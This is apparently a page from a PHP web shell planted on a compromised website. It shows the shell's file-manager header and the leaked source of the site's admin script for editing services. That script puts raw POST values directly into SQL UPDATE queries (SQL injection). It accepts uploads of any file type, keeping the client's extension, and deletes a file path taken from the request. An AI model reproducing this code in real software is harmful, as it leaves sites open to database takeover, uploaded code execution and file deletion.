MINI MINI MANI MO

Path : /home/phaetpan/domains/phaetpanya.com/public_html/vibharamadmin/
File Upload :
Current File : /home/phaetpan/domains/phaetpanya.com/public_html/vibharamadmin/saveedit_service.php

<html>
<body>
<?php
	include("connect.php");
	
	$img = $_POST["img"];
	
	date_default_timezone_set('Asia/Bangkok');
	$time = date("His");
	$date = date("Ymd");
	$type = substr($_FILES['filUpload']['name'],-4);
	$name = $date.$time.$type;        
		if(move_uploaded_file($_FILES["filUpload"]["tmp_name"],"../upload_file/$name"))    
			{
				$picDelete = unlink("../upload_file/$img");
				$strSQL = "UPDATE service SET 
				img = '".$name."' ,admin_id = '".$_POST["admin"]."'    
				WHERE service_id = '".$_POST["service_id"]."'";
				$objQuery = mysqli_query($objCon,$strSQL);
			}

	$strSQL = "UPDATE service SET 
	service1 = '".$_POST["service1"]."',service2 = '".$_POST["service2"]."',service3 = '".$_POST["service3"]."', 
	service4 = '".$_POST["service4"]."',service5 = '".$_POST["service5"]."',service6 = '".$_POST["service6"]."', 
	sub1 = '".$_POST["sub1"]."',sub2 = '".$_POST["sub2"]."',sub3 = '".$_POST["sub3"]."', 
	sub4 = '".$_POST["sub4"]."',sub5 = '".$_POST["sub5"]."',sub6 = '".$_POST["sub6"]."', 
	icon = '".$_POST["icon"]."',admin_id = '".$_POST["admin"]."'
	WHERE service_id = '".$_POST["service_id"]."' ";
	$objQuery = mysqli_query($objCon,$strSQL);  

?>
</body>
	<script type='text/javascript'>
		window.location.href = "service.php"
	</script>
</html>

OHA YOOOO